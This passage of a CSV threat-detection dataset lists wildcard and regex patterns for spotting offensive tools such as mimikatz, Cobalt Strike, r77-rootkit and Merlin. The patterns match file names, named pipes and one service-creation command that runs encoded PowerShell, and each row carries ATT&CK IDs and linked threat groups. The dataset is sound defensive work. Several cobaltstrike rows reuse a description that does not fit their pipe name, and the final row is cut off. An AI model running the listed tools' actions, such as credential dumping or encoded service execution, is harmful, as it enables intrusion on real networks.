"*\$*.kirbi*",".{0,1000}\\\$.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","13544"
"*\(s)AINT\Cam*",".{0,1000}\\\(s\)AINT\\Cam.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","13545"
"*\(s)AINT\Logs*",".{0,1000}\\\(s\)AINT\\Logs.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","13546"
"*\(s)AINT\saint.jar*",".{0,1000}\\\(s\)AINT\\saint\.jar.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","13547"
"*\(s)AINT\Screenshot*",".{0,1000}\\\(s\)AINT\\Screenshot.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","13548"
"*\*.O365.GroupMembership_AdminGroups.txt*",".{0,1000}\\.{0,1000}\.O365\.GroupMembership_AdminGroups\.txt.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","N/A","8","715","103","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z","13550"
"*\*.O365.GroupMembership_VPNGroups.txt*",".{0,1000}\\.{0,1000}\.O365\.GroupMembership_VPNGroups\.txt.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","N/A","8","715","103","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z","13551"
"*\*.O365.Roles_Admins.txt*",".{0,1000}\\.{0,1000}\.O365\.Roles_Admins\.txt.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","N/A","8","715","103","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z","13552"
"*\*.smukx*",".{0,1000}\\.{0,1000}\.smukx.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source ransomware Encryfer in rust","T1486 - T1489 - T1485","TA0040 - TA0043 - TA0042","N/A","N/A","Ransomware","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","13553"
"*\*_AD-Audit_*.txt*",".{0,1000}\\.{0,1000}_AD\-Audit_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","Invoke-ADEnum","Automate Active Directory Enumeration","T1016 - T1482","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ADEnum","1","0","N/A","N/A","7","5","448","50","2025-04-09T10:13:47Z","2023-04-18T11:19:42Z","13554"
"*\.\pipe\$77childproc*",".{0,1000}\\\.\\pipe\\\$77childproc.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#namedpipe","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","13556"
"*\.\pipe\$77childproc64*",".{0,1000}\\\.\\pipe\\\$77childproc64.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#namedpipe","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","13557"
"*\.\pipe\$77control_redirect*",".{0,1000}\\\.\\pipe\\\$77control_redirect.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#namedpipe","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","13558"
"*\.clone.dll*",".{0,1000}\\\.clone\.dll.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","13561"
"*\.eKeys-Parsed.txt*",".{0,1000}\\\.eKeys\-Parsed\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","13564"
"*\.README_TO_RESTORE*",".{0,1000}\\\.README_TO_RESTORE.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13566"
"*\:MLKH*",".{0,1000}\\\:MLKH.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed HKLM:\","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","13571"
"*\\$ComputerName delete $ServiceName*",".{0,1000}\\\\\$ComputerName\sdelete\s\$ServiceName.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","13572"
"*\\* create Service_* binpath= `""C:\Windows\System32\cmd.exe /c powershell.exe -enc *",".{0,1000}\\\\.{0,1000}\screate\sService_.{0,1000}\sbinpath\=\s\`\""C\:\\Windows\\System32\\cmd\.exe\s\/c\spowershell\.exe\s\-enc\s.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","13573"
"*\\*\pipe\psexecsvc*",".{0,1000}\\\\.{0,1000}\\pipe\\psexecsvc.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","#namedpipe","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","13574"
"*\\.\\pipe\\$77childproc*",".{0,1000}\\\\\.\\\\pipe\\\\\$77childproc.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#namedpipe","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","13575"
"*\\.\\pipe\\$77control_redirect*",".{0,1000}\\\\\.\\\\pipe\\\\\$77control_redirect.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#namedpipe","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","13576"
"*\\.\\pipe\\blindspot-*",".{0,1000}\\\\\.\\\\pipe\\\\blindspot\-.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","#namedpipe","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","13577"
"*\\.\\pipe\\kangaroo*",".{0,1000}\\\\\.\\\\pipe\\\\kangaroo.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","#namedpipe","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","13578"
"*\\.\\pipe\\lsarelayx*",".{0,1000}\\\\\.\\\\pipe\\\\lsarelayx.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","#namedpipe","N/A","10","6","562","69","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z","13579"
"*\\.\\pipe\\Teste*",".{0,1000}\\\\\.\\\\pipe\\\\Teste.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","#namedpipe","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","13581"
"*\\.\mimidrv*",".{0,1000}\\\\\.\\mimidrv.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","13582"
"*\\.\Nidhogg*",".{0,1000}\\\\\.\\Nidhogg.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","13583"
"*\\.\pipe\bypassuac*",".{0,1000}\\\\\.\\pipe\\bypassuac.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13584"
"*\\.\pipe\coerced\pipe\spoolss*",".{0,1000}\\\\\.\\pipe\\coerced\\pipe\\spoolss.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","#namedpipe","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","13585"
"*\\.\pipe\EasySystem*",".{0,1000}\\\\\.\\pipe\\EasySystem.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#namedpipe","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","13586"
"*\\.\pipe\hashdump*",".{0,1000}\\\\\.\\pipe\\hashdump.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13587"
"*\\.\pipe\imposecost*",".{0,1000}\\\\\.\\pipe\\imposecost.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","#namedpipe","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","13588"
"*\\.\pipe\keylogger*",".{0,1000}\\\\\.\\pipe\\keylogger.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13589"
"*\\.\pipe\Merlin*",".{0,1000}\\\\\.\\pipe\\Merlin.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","#namedpipe","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","13590"
"*\\.\pipe\merlin*",".{0,1000}\\\\\.\\pipe\\merlin.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","#namedpipe","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","13591"
"*\\.\pipe\mimi*",".{0,1000}\\\\\.\\pipe\\mimi.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","#namedpipe","N/A","10","10","1140","160","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z","13592"
"*\\.\pipe\mimikatz*",".{0,1000}\\\\\.\\pipe\\mimikatz.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13593"
"*\\.\pipe\netview*",".{0,1000}\\\\\.\\pipe\\netview.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - 